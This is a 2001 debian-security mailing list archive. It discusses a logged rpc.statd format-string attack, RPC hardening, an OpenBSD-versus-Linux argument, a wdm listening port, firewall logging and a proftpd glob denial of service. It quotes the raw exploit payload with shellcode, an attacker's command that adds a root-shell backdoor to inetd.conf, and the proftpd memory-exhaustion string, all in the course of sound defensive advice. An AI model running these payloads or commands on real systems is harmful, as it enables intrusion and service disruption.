On Wed, May 23, 2001 at 10:58:43PM -0700, Wade Richards wrote: Yep, it's a security problem. Someone is trying to hack into your system using one of many known security bugs in the rpc daemon. If you don't need the rpc stuff running, then just disable it (better yet, uninstall it). If you really do need it running, but it's only used locally, then I suggest you use ipchains to drop any packets targeted to port 111. But best is to simply remove it entirely. That only blocks portmap. Other UDP services can be found with a UDP port scan by e.g. nmap. -- #define X(x,y) x##y Peter Cordes ; e-mail: X([EMAIL PROTECTED] , ns.ca) The gods confound the man who first found out how to distinguish the hours! Confound him, too, who in this place set up a sundial, to cut and hack my day so wretchedly into small pieces! -- Plautus, 200 BCE
Re: strange log entry
Definitely a security problem. But the fact that you actually saw something is good news .. it means the exploit didn't work. If it had worked, the thing would just die quietly and not log anything. Better off without rpc anyway, unless you *need* it for NFS or something similar. And if you really need it, make sure it's firewalled. I get about 30 similar rpc.statd scans every day on most of my machines. Glad they're not running rpc.statd :) --Henry On Thu, 24 May 2001 [EMAIL PROTECTED] wrote: Heya :) I was running a 'tail -f' on my /var/log/messages and this entry appeared while I was connected to the internet: May 24 10:08:11 noogies -- MARK -- May 24 10:20:34 noogies May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for ^X???^X???^Y???^Y???^Z???^Z???^[???^[???%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 May 24 10:20:34 noogies ?^F/bin?F^D/shA0?\210F^G\211v^L\215V^P\215N^L\211??^K?\200?^A?\200?\177??? and it has me worried it may be a security issue. I'm very new to linux, and newer again to debian, and at this stage I really don't have a clue as to what the above log entry is trying to tell me... Any input or comments would be very appreciated :) Thank you - trevs -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: strange log entry
On Thu, May 24, 2001 at 01:24:50AM -0400, Ed Street wrote: Hello, Well first off WHY are you running the rpc stuff? (i.e. I can root a redhat 6.x box in under 30 seconds with a rpc exploit from a clean install) Turn that stuff OFF. Not to start a thread discussing OSes, but ... OpenBSD ships with rstatd and ruserd enabled by default and according to http://www.openbsd.org/ Four years without a remote hole in the default install! Which begs the question, especially since the *BSD's release their sources under BSD style liscenses, why does rpc remain a security problem in Linux? Is it the kernel? Is it the rpc code? Simply curious, [EMAIL PROTECTED]
Re: strange log entry
On Thu, May 24, 2001 at 01:34:01AM -0700, Jacob Meuser wrote: On Thu, May 24, 2001 at 01:24:50AM -0400, Ed Street wrote: Hello, Well first off WHY are you running the rpc stuff? (i.e. I can root a redhat 6.x box in under 30 seconds with a rpc exploit from a clean install) Turn that stuff OFF. Not to start a thread discussing OSes, but ... OpenBSD ships with rstatd and ruserd enabled by default and according to http://www.openbsd.org/ Four years without a remote hole in the default install! Which begs the question, especially since the *BSD's release their sources under BSD style liscenses, why does rpc remain a security problem in Linux? Is it the kernel? Is it the rpc code? because that underlined portion is the key here, OpenBSD keeps the rpc stuff turned off by default, thus even if a root hole is found in a rpc service (other then portmap) openbsd does not consider that a `remote hole in the *default install*' they are quick to mention this every time a hole is found in any daemon OpenBSD ships with but leaves off by default. -- Ethan Benson http://www.alaska.net/~erbenson/ pgpNKsDqtt4Is.pgp Description: PGP signature
wdm security
I am a little concerned about XFree86+wdm keeping a bunch of processes listening on port 32768. (wdm is the windowmaker xdm replacement.) According to lsof -i TCP, there are a number of processes listening on the port. When using X, I accept the obvious port 6000 being open for inbound connections and I believe XFree is secure enough with it (I only allow local logged-in user from localhost to contact to my X server) but what is this wdm doing listening on 32768? nmap says it's an unknown port and /etc/services does not recognise it. IANA seems to recognise the port as filenet-tms 32768/tcp Filenet TMS filenet-tms 32768/udp Filenet TMS but I have no idea what Filenet TMS is. I am a little at a loss with this. Should I trash wdm or what? It's a little sad thing to do since it allows me to choose a window manager at login time, something xdm does not do (at least didn't last time I checked). For what it's worth, my wdm is Version: 1.20-5, from unstable. The newest seems to be 1.20-10, but I am in a habit of upgrading unstable stuff only if there is a problem/security issue. (Because things sometimes break, like alsa-utils was broken last week.) -- --- | Juha Jäykkä, [EMAIL PROTECTED]| | home: http://www.utu.fi/~juolja/ | ---
Re: strange log entry
On Thu, May 24, 2001 at 12:43:40AM -0800, Ethan Benson wrote: On Thu, May 24, 2001 at 01:34:01AM -0700, Jacob Meuser wrote: On Thu, May 24, 2001 at 01:24:50AM -0400, Ed Street wrote: Hello, Well first off WHY are you running the rpc stuff? (i.e. I can root a redhat 6.x box in under 30 seconds with a rpc exploit from a clean install) Turn that stuff OFF. Not to start a thread discussing OSes, but ... OpenBSD ships with rstatd and ruserd enabled by default and according to http://www.openbsd.org/ Four years without a remote hole in the default install! Which begs the question, especially since the *BSD's release their sources under BSD style liscenses, why does rpc remain a security problem in Linux? Is it the kernel? Is it the rpc code? because that underlined portion is the key here, OpenBSD keeps the rpc stuff turned off by default, thus even if a root hole is found in a rpc service (other then portmap) openbsd does not consider that a `remote hole in the *default install*' they are quick to mention this every time a hole is found in any daemon OpenBSD ships with but leaves off by default. BS, when was the last time you installed OpenBSD? I just did an install today. I guarantee portmap, ruserd, and rstatd are enabled by default, as the installer doesn't even ask what you want to activate, and these programs are part of the base tarball. [EMAIL PROTECTED]
Re: strange log entry
On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote: BS, when was the last time you installed OpenBSD? I just did an install 2.5 today. I guarantee portmap, ruserd, and rstatd are enabled by default, as the installer doesn't even ask what you want to activate, and these programs are part of the base tarball. in 2.5 ftpd, portmap, smtp, and identd were open, i am pretty sure rstatd was not. 2.6 i think disabled ftpd by default, shortly thereafter a root hole was found in openbsd's ftpd and they prompty said `ftpd is not enabled in the default install of 2.6 (or whatever) and thus there is no root hole in our default install' -- Ethan Benson http://www.alaska.net/~erbenson/ pgpb9SYUDuSVF.pgp Description: PGP signature
Re: strange log entry
On Thu, May 24, 2001 at 04:06:08AM -0800, Ethan Benson wrote: On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote: BS, when was the last time you installed OpenBSD? I just did an install 2.5 That was what, 2 years ago? today. I guarantee portmap, ruserd, and rstatd are enabled by default, as the installer doesn't even ask what you want to activate, and these programs are part of the base tarball. in 2.5 ftpd, portmap, smtp, and identd were open, i am pretty sure rstatd was not. 2.6 i think disabled ftpd by default, shortly thereafter a root hole was found in openbsd's ftpd and they prompty said `ftpd is not enabled in the default install of 2.6 (or whatever) and thus there is no root hole in our default install' Ah, they probably caught the problem shortly before 2.6 release, and didn't have time to fix ftp code, but changing rc.conf was doable. Anyway, as of 2.9, portmap, rstatd, ruserd, time, daytime, comsat, sshd and identd are enabled by default. Like I said, I didn't want to start a discussion about OpenBSD vs Linux, I have seen posts from you saying that you like some features of OpenBSD, /sbin/nologin for example. I'm just curious why the 'r' tools are apparently so vulnerable in Linux. If the OpenBSD folks are willing to risk creditability by claiming that their default install has no remote holes, while enabling portmap and rstatd by default, why can't Linux users feel safe running those daemons also? [EMAIL PROTECTED]
Re: strange log entry
On Thu, May 24, 2001 at 05:41:08AM -0700, Jacob Meuser wrote: On Thu, May 24, 2001 at 04:06:08AM -0800, Ethan Benson wrote: On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote: BS, when was the last time you installed OpenBSD? I just did an install 2.5 That was what, 2 years ago? 1.5 years or so yes, i haven't messed with openbsd in a while, i was going to use it for my firewall but there were some problems with it so i ditched in favor of debian. OpenBSD's security reputation is a bit exaggerated, with some good admining a linux box can be just as secure... i was also quite annoyed by its complete lack of upgradability, i tried twice in testing to upgrade the dist from one version to another it failed and made a mess every time, screw that i don't think much of rebuilding a box every 6mo - 1 year just to keep up with the times. Ah, they probably caught the problem shortly before 2.6 release, and didn't have time to fix ftp code, but changing rc.conf was doable. heh your almost as cynical as i am ;-) Anyway, as of 2.9, portmap, rstatd, ruserd, time, daytime, comsat, sshd and identd are enabled by default. hmm maybe my memory is funky but that seems like more then i saw out of the box... it still had more crap running then i prefer. Like I said, I didn't want to start a discussion about OpenBSD vs Linux, I have seen posts from you saying that you like some features of OpenBSD, /sbin/nologin for example. its a nice system, i like the simplicity and clean design, its like debian in that. but upgrading the whole thing is simply impossible. well maybe grabbing all source from CVS and doing make world will do it, but i didn't try it. the `official' upgrade system is broken. I'm just curious why the 'r' tools are apparently so vulnerable in Linux. If the OpenBSD folks are willing to risk creditability by claiming that their default install has no remote holes, while enabling portmap and rstatd by default, why can't Linux users feel safe running those daemons also? well openbsd claims to have audited everything they enable by default, and everything in their base install (which is VERY lean). from reading bugtraq they seem to have a very bad habit about fixing bugs quietly and not bothering to send patches upstream, instead posting sarcastic messages along the lines of `oh yeah we fixed that in CVS 3 years ago' (check out the recent joe DEADJOE vulnerabity for an example). of course i could be wrong, and all upstream developers are just blackholing openbsd security patches. -- Ethan Benson http://www.alaska.net/~erbenson/ pgpXWJGVW21UQ.pgp Description: PGP signature
Re: strange log entry
On Thu, 24 May 2001 [EMAIL PROTECTED] wrote: What you have there is someone trying to do a buffer overflow attack on rpc.statd. The idea is that once the buffer is blown, they will get a chance to issue a command as root. In the attack that was attempted on on of the systems I was given to supervise the last part of the garbage sent to the buffer was: /bin/sh -c echo 9704 stream tcp nowait root /bin/sh sh -i /etc/inetd.conf;killall -HUP inetd This, if it had succeeded, would have created a new line in inetd.conf and restarted inetd. Then they would have come in on port 9704 to a nice root shell and did what ever they wanted to do probably remove that line, edit my logs, install a root kit, and leave as quietly as possible. Luckily this time it didn't work and left some dirty footprints as evidence. As stated earlier the best way to deal with this, if you don't need rpc services running for NFS/NIS or something similar is to just shut portmapper and all the other RPC services down and remove them from your start up scripts. I was curios however, so I just made sure tcp wrapper -tcpd - covered portmapper and added portmap: ALL to my /etc/hosts.deny file so I could gather some IP numbers via TCPD logging. Figure I should let the networks assigned the IPs know that some of their machines are compromised/being used for cracking. While setting up a firewall as others have previously suggested is a dang good idea, don't forget to use tcp wrappers also, if for only the logging. For the security conscious, or the inexperienced a good first step right after first booting a machine is to type su -c echo ALL:ALL /etc/hosts.deny root . I'd do that before even connecting to the network. Later if you must you can relax it a bit, but its a good place to start. Howerver, now that you have seen this one attack, you should probably go over your logs and system accounting files with a fine tooth comb and see if anyone else might have succeeded before or after ;) This is a far from exhaustive list but try: looking for any breaks in your log files or unexpected daemon restarts. examine your crontabs to see if there are any jobs you didn't put there. check your /etc/passwd file for any unrecognized users or strange shells. check inetd.conf for any odd entries. run a find / -m x to look for new or edited files. see if there are any there that you don't remember editing. Look for changed permissions too. download at root kit detector and see if anyone has already left you a present. again this is just the start ;) I apologize to folks who consider this all old-news, but trevs was brave enough to admit he didn't know, so there are probably a few others lurking in the same boat ;) Good luck! David. Heya :) I was running a 'tail -f' on my /var/log/messages and this entry appeared while I was connected to the internet: May 24 10:08:11 noogies -- MARK -- May 24 10:20:34 noogies May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 May 24 10:20:34 noogies Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ and it has me worried it may be a security issue. I'm very new to linux, and newer again to debian, and at this stage I really don't have a clue as to what the above log entry is trying to tell me... Any input or comments would be very appreciated :) Thank you - trevs -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: wdm security
On Thu, May 24, 2001 at 01:53:46PM +0300, Juha Jäykkä wrote: I am a little concerned about XFree86+wdm keeping a bunch of processes listening on port 32768. (wdm is the windowmaker xdm Hi. I am the wdm maintainer for Debian. I haven't been maintaining this package for too long, and I'm not sure why it listens on port 32768. I am going to look in to it, because it doesn't seem necessary to me. If I find that it is something that can safely be turned off (or if it's a bug) I will fix it for the next upload. Interestingly enough, a quick find/grep traversal of the wdm source indicates that the only code for setting up network listeners comes directly from the xdm sources without modification at all. That implies to me that the listener on port 32768 should be as safe as the standard xdm listener on port 6000. But I still don't see why it's there. this. Should I trash wdm or what? It's a little sad thing to do since it allows me to choose a window manager at login time, something xdm does not do (at least didn't last time I checked). I would not trash wdm just yet. Let me take a look. If you're concerned, you might want to firewall that port using ipchains or iptables. noah -- ___ | Web: http://web.morgul.net/~frodo/ | PGP Public Key: http://web.morgul.net/~frodo/mail.html pgpw8KG2aN0EM.pgp Description: PGP signature
Re: strange log entry
On Thu, May 24, 2001 at 01:34:01AM -0700, Jacob Meuser wrote: OpenBSD ships with rstatd and ruserd enabled by default and according to http://www.openbsd.org/ Four years without a remote hole in the default install! Which begs the question, especially since the *BSD's release their sources under BSD style liscenses, why does rpc remain a security problem in Linux? Is it the kernel? Is it the rpc code? This is not the same stuff at all. They ship with rstatd turned on, not rpc.statd. They are completely different. rpc.statd is used by nfs. rstatd is used by the rstat program, which tells you info about machines on your network. It is like running 'uptime' on all your machines at once. noah -- ___ | Web: http://web.morgul.net/~frodo/ | PGP Public Key: http://web.morgul.net/~frodo/mail.html pgpL7aF0GbSea.pgp Description: PGP signature
Problem with logging firewall packets
Hi guys/gals, Okay, I'm *really* embarrassed about this, but I can't get syslog to log firewall packets to a logfile - it insists on sending them to my Debian box's console. I've checked the /etc/syslog.conf file and there's no mention of a console there at all, so what am I doing wrong? The crappy ipchains test script I've rigged is working, a grc.com scan is being blocked in all the right ways, but I just can't get the logs on magnetic media... what really simple, obvious, even-a-redheaded-stepchild-could-work-it-out step am I missing? Thanks... Paul D -crap-
RE: strange log entry
Hello, the same can be said with nfs and coda/samba (windows filesharing)they are both easily exploitable codes simply by the way they operate. Basicaly in a nutshell the code assume to much which makes it easily exploitable. Ed -Original Message- From: Jacob Meuser [mailto:[EMAIL PROTECTED] Sent: Thursday, May 24, 2001 4:34 AM To: debian-security@lists.debian.org Subject: Re: strange log entry On Thu, May 24, 2001 at 01:24:50AM -0400, Ed Street wrote: Hello, Well first off WHY are you running the rpc stuff? (i.e. I can root a redhat 6.x box in under 30 seconds with a rpc exploit from a clean install) Turn that stuff OFF. Not to start a thread discussing OSes, but ... OpenBSD ships with rstatd and ruserd enabled by default and according to http://www.openbsd.org/ Four years without a remote hole in the default install! Which begs the question, especially since the *BSD's release their sources under BSD style liscenses, why does rpc remain a security problem in Linux? Is it the kernel? Is it the rpc code? Simply curious, [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
RE: strange log entry
Hello, that's simple ;) If they was stable/non-exploitable then we'd be using rpc inplace of ssh ;) Ed -Original Message- From: Jacob Meuser [mailto:[EMAIL PROTECTED] Sent: Thursday, May 24, 2001 8:41 AM To: debian-security@lists.debian.org Subject: Re: strange log entry On Thu, May 24, 2001 at 04:06:08AM -0800, Ethan Benson wrote: On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote: BS, when was the last time you installed OpenBSD? I just did an install 2.5 That was what, 2 years ago? today. I guarantee portmap, ruserd, and rstatd are enabled by default, as the installer doesn't even ask what you want to activate, and these programs are part of the base tarball. in 2.5 ftpd, portmap, smtp, and identd were open, i am pretty sure rstatd was not. 2.6 i think disabled ftpd by default, shortly thereafter a root hole was found in openbsd's ftpd and they prompty said `ftpd is not enabled in the default install of 2.6 (or whatever) and thus there is no root hole in our default install' Ah, they probably caught the problem shortly before 2.6 release, and didn't have time to fix ftp code, but changing rc.conf was doable. Anyway, as of 2.9, portmap, rstatd, ruserd, time, daytime, comsat, sshd and identd are enabled by default. Like I said, I didn't want to start a discussion about OpenBSD vs Linux, I have seen posts from you saying that you like some features of OpenBSD, /sbin/nologin for example. I'm just curious why the 'r' tools are apparently so vulnerable in Linux. If the OpenBSD folks are willing to risk creditability by claiming that their default install has no remote holes, while enabling portmap and rstatd by default, why can't Linux users feel safe running those daemons also? [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
RE: wdm security
Hello, If memory serves me correctly there's a line in /etc/X11 that you can add/modify to tell it to NOT lissen. Ed -Original Message- From: Noah L. Meyerhans [mailto:[EMAIL PROTECTED] Sent: Thursday, May 24, 2001 10:47 AM To: Debian Security List Subject: Re: wdm security On Thu, May 24, 2001 at 01:53:46PM +0300, Juha Jäykkä wrote: I am a little concerned about XFree86+wdm keeping a bunch of processes listening on port 32768. (wdm is the windowmaker xdm Hi. I am the wdm maintainer for Debian. I haven't been maintaining this package for too long, and I'm not sure why it listens on port 32768. I am going to look in to it, because it doesn't seem necessary to me. If I find that it is something that can safely be turned off (or if it's a bug) I will fix it for the next upload. Interestingly enough, a quick find/grep traversal of the wdm source indicates that the only code for setting up network listeners comes directly from the xdm sources without modification at all. That implies to me that the listener on port 32768 should be as safe as the standard xdm listener on port 6000. But I still don't see why it's there. this. Should I trash wdm or what? It's a little sad thing to do since it allows me to choose a window manager at login time, something xdm does not do (at least didn't last time I checked). I would not trash wdm just yet. Let me take a look. If you're concerned, you might want to firewall that port using ipchains or iptables. noah -- ___ | Web: http://web.morgul.net/~frodo/ | PGP Public Key: http://web.morgul.net/~frodo/mail.html
RE: Problem with logging firewall packets
Hello, Make sure you have klogd and syslogd running. Ed -Original Message- From: Paul Dossett [mailto:[EMAIL PROTECTED] Sent: Thursday, May 24, 2001 12:00 PM To: debian-security@lists.debian.org Subject: Problem with logging firewall packets Hi guys/gals, Okay, I'm *really* embarrassed about this, but I can't get syslog to log firewall packets to a logfile - it insists on sending them to my Debian box's console. I've checked the /etc/syslog.conf file and there's no mention of a console there at all, so what am I doing wrong? The crappy ipchains test script I've rigged is working, a grc.com scan is being blocked in all the right ways, but I just can't get the logs on magnetic media... what really simple, obvious, even-a-redheaded-stepchild-could-work-it-out step am I missing? Thanks... Paul D -crap- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
msg from list when posting.
Hello, anyone know why I get this when I post anything to this list? Fatal Error: \n \nQuota for user [EMAIL PROTECTED] exceeded! \n \nOriginal message follows: \n \n it's from their mail delivery subsystem. Ed -Original Message- From: Ed Street [mailto:[EMAIL PROTECTED] Sent: Thursday, May 24, 2001 12:10 PM To: debian-security@lists.debian.org Subject: RE: strange log entry Hello, that's simple ;) If they was stable/non-exploitable then we'd be using rpc inplace of ssh ;) Ed -Original Message- From: Jacob Meuser [mailto:[EMAIL PROTECTED] Sent: Thursday, May 24, 2001 8:41 AM To: debian-security@lists.debian.org Subject: Re: strange log entry On Thu, May 24, 2001 at 04:06:08AM -0800, Ethan Benson wrote: On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote: BS, when was the last time you installed OpenBSD? I just did an install 2.5 That was what, 2 years ago? today. I guarantee portmap, ruserd, and rstatd are enabled by default, as the installer doesn't even ask what you want to activate, and these programs are part of the base tarball. in 2.5 ftpd, portmap, smtp, and identd were open, i am pretty sure rstatd was not. 2.6 i think disabled ftpd by default, shortly thereafter a root hole was found in openbsd's ftpd and they prompty said `ftpd is not enabled in the default install of 2.6 (or whatever) and thus there is no root hole in our default install' Ah, they probably caught the problem shortly before 2.6 release, and didn't have time to fix ftp code, but changing rc.conf was doable. Anyway, as of 2.9, portmap, rstatd, ruserd, time, daytime, comsat, sshd and identd are enabled by default. Like I said, I didn't want to start a discussion about OpenBSD vs Linux, I have seen posts from you saying that you like some features of OpenBSD, /sbin/nologin for example. I'm just curious why the 'r' tools are apparently so vulnerable in Linux. If the OpenBSD folks are willing to risk creditability by claiming that their default install has no remote holes, while enabling portmap and rstatd by default, why can't Linux users feel safe running those daemons also? [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Problem with logging firewall packets
I'm running Progeny, and had to go to Debian's testing distro to get klogd, but that doesn't seem to do anything... still investigating. Both syslogd and klogd are running, according to top.. :) Any more ideas? I'm really stumped. This worked fine under Red Hat. ppp - Original Message - From: Ed Street [EMAIL PROTECTED] To: Paul Dossett [EMAIL PROTECTED]; debian-security@lists.debian.org Sent: Friday, May 25, 2001 2:17 AM Subject: RE: Problem with logging firewall packets Hello, Make sure you have klogd and syslogd running. Ed -Original Message- From: Paul Dossett [mailto:[EMAIL PROTECTED] Sent: Thursday, May 24, 2001 12:00 PM To: debian-security@lists.debian.org Subject: Problem with logging firewall packets Hi guys/gals, Okay, I'm *really* embarrassed about this, but I can't get syslog to log firewall packets to a logfile - it insists on sending them to my Debian box's console. I've checked the /etc/syslog.conf file and there's no mention of a console there at all, so what am I doing wrong? The crappy ipchains test script I've rigged is working, a grc.com scan is being blocked in all the right ways, but I just can't get the logs on magnetic media... what really simple, obvious, even-a-redheaded-stepchild-could-work-it-out step am I missing? Thanks... Paul D -crap- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
RE: Problem with logging firewall packets
Hello, OK what's being logged to console? Under iptables it WILL log warnings + to console unless you modify /etc/init.d/klogd. this is a clip from my rc.firewall.iptables btw # # LOG level option. NOTE klogd reflects these values for console broadcast # Simply start klogd with -c 4 to ONLY display errors and above on the console. LOG_LEVEL=notice #define KERN_EMERG 0 /* system is unusable */ #define KERN_ALERT 1 /* action must be taken immediately */ #define KERN_CRIT 2 /* critical conditions */ #define KERN_ERR3 /* error conditions */ #define KERN_WARNING4 /* warning conditions */ #define KERN_NOTICE 5 /* normal but significant condition */ #define KERN_INFO 6 /* informational*/ #define KERN_DEBUG 7 /* debug-level messages */ # Ed -Original Message- From: Paul Dossett [mailto:[EMAIL PROTECTED] Sent: Thursday, May 24, 2001 12:24 PM To: Ed Street; debian-security@lists.debian.org Subject: Re: Problem with logging firewall packets I'm running Progeny, and had to go to Debian's testing distro to get klogd, but that doesn't seem to do anything... still investigating. Both syslogd and klogd are running, according to top.. :) Any more ideas? I'm really stumped. This worked fine under Red Hat. ppp - Original Message - From: Ed Street [EMAIL PROTECTED] To: Paul Dossett [EMAIL PROTECTED]; debian-security@lists.debian.org Sent: Friday, May 25, 2001 2:17 AM Subject: RE: Problem with logging firewall packets Hello, Make sure you have klogd and syslogd running. Ed -Original Message- From: Paul Dossett [mailto:[EMAIL PROTECTED] Sent: Thursday, May 24, 2001 12:00 PM To: debian-security@lists.debian.org Subject: Problem with logging firewall packets Hi guys/gals, Okay, I'm *really* embarrassed about this, but I can't get syslog to log firewall packets to a logfile - it insists on sending them to my Debian box's console. I've checked the /etc/syslog.conf file and there's no mention of a console there at all, so what am I doing wrong? The crappy ipchains test script I've rigged is working, a grc.com scan is being blocked in all the right ways, but I just can't get the logs on magnetic media... what really simple, obvious, even-a-redheaded-stepchild-could-work-it-out step am I missing? Thanks... Paul D -crap- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Problem with logging firewall packets
- Original Message - From: Ronny Adsetts [EMAIL PROTECTED] To: Paul Dossett [EMAIL PROTECTED] Sent: Friday, May 25, 2001 2:27 AM Subject: RE: Problem with logging firewall packets Okay, I'm *really* embarrassed about this, but I can't get syslog to log firewall packets to a logfile - it insists on sending them to my Debian box's console. I've checked the /etc/syslog.conf file and there's no mention of a console there at all, so what am I doing wrong? The crappy ipchains test script I've rigged is working, a grc.com scan is being blocked in all the right ways, but I just can't get the logs on magnetic media... what really simple, obvious, even-a-redheaded-stepchild-could-work-it-out step am I missing? Probably klogd is missing. try: # apt-get update apt-get install klogd It was installed, but the kicker was that something seemed to be wrong with the init script, the syslogd and klogd daemons weren't restarting when I executed their scripts, so the changes I made in the syslog.conf file were being ignored. Manually killing the processes and restarting them worked, and logging is back... thanks all! Hopefully I can return the favour for some *other* foolish newbie... ;) ppp
Re: Problem with logging firewall packets
Havent seen this before but a work around could be just have syslog-ng read from /proc/kmsg does the same thing as a klogd would do. On Fri, 25 May 2001, Paul Dossett wrote: I'm running Progeny, and had to go to Debian's testing distro to get klogd, but that doesn't seem to do anything... still investigating. Both syslogd and klogd are running, according to top.. :) Any more ideas? I'm really stumped. This worked fine under Red Hat. ppp - Original Message - From: Ed Street [EMAIL PROTECTED] To: Paul Dossett [EMAIL PROTECTED]; debian-security@lists.debian.org Sent: Friday, May 25, 2001 2:17 AM Subject: RE: Problem with logging firewall packets Hello, Make sure you have klogd and syslogd running. Ed -Original Message- From: Paul Dossett [mailto:[EMAIL PROTECTED] Sent: Thursday, May 24, 2001 12:00 PM To: debian-security@lists.debian.org Subject: Problem with logging firewall packets Hi guys/gals, Okay, I'm *really* embarrassed about this, but I can't get syslog to log firewall packets to a logfile - it insists on sending them to my Debian box's console. I've checked the /etc/syslog.conf file and there's no mention of a console there at all, so what am I doing wrong? The crappy ipchains test script I've rigged is working, a grc.com scan is being blocked in all the right ways, but I just can't get the logs on magnetic media... what really simple, obvious, even-a-redheaded-stepchild-could-work-it-out step am I missing? Thanks... Paul D -crap- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
proftpd exploit??
Hi!! I have Potato in a machine, with ii proftpd1.2.0pre10-2.0 Versatile, virtual-hosting FTP daemon It's the last version in security.debian.org I've tried to exploit it by login and sending: ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../ and suddenly it began eating memory and getting slow all the system. When I killed proftpd, system was almost KO. Any solution?? Thanks in advance :-) -- 101 Things you do NOT want your System Administrator to say. 93. We don't support that. We won't support that. -- Cagarruta [EMAIL PROTECTED] Linux Reg. User #66054 --
Re: proftpd exploit??
On Thu, 24 May 2001, Andres Herrera wrote: I've tried to exploit it by login and sending: ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../ and suddenly it began eating memory and getting slow all the system. ... Any solution?? Resource limits on the ftp server process? Zak.
Re: proftpd exploit??
Andres Herrera wrote on Thu May 24, 2001 at 07:43:50PM: [proftpd exploit ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../] Any solution?? There was mentioned a suggested entry (ment as an intermediate solution until proftpd has been fixed) to /etc/proftpd.conf: DenyFilter \*.*/ hth, Matthias -- Matthias Richter --+- stud. soz. inf. -+-- http://www.uni-leipzig.de --GPG Public Key: http://www.matthias-richter.de/gpg.ascii-- «Reality must take precedence over public relations, for Mother Nature cannot be fooled.» -- R.P. Feynman pgpCuKMLd9tnI.pgp Description: PGP signature
Re: proftpd exploit??
On Thu, May 24, 2001 at 07:43:50PM +0200, Andres Herrera wrote: Hi!! I have Potato in a machine, with ii proftpd1.2.0pre10-2.0 Versatile, virtual-hosting FTP daemon It's the last version in security.debian.org I've tried to exploit it by login and sending: ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../ and suddenly it began eating memory and getting slow all the system. When I killed proftpd, system was almost KO. This is an old an known bug. It's fixed in the CVS tree and the current unstable Version. Have a look at the bugtracking System at www.proftpd.org Any solution?? There are a few PathDeny filters out to check this and other Versions of this Bug. The other solution is to upgrade to the very stable unstable version ;-) Sven -- Subject: Re: woody hanging WRT subject. $ apt-get install viagra ;-) [Karsten M. Self in debian-user]
Re: proftpd exploit??
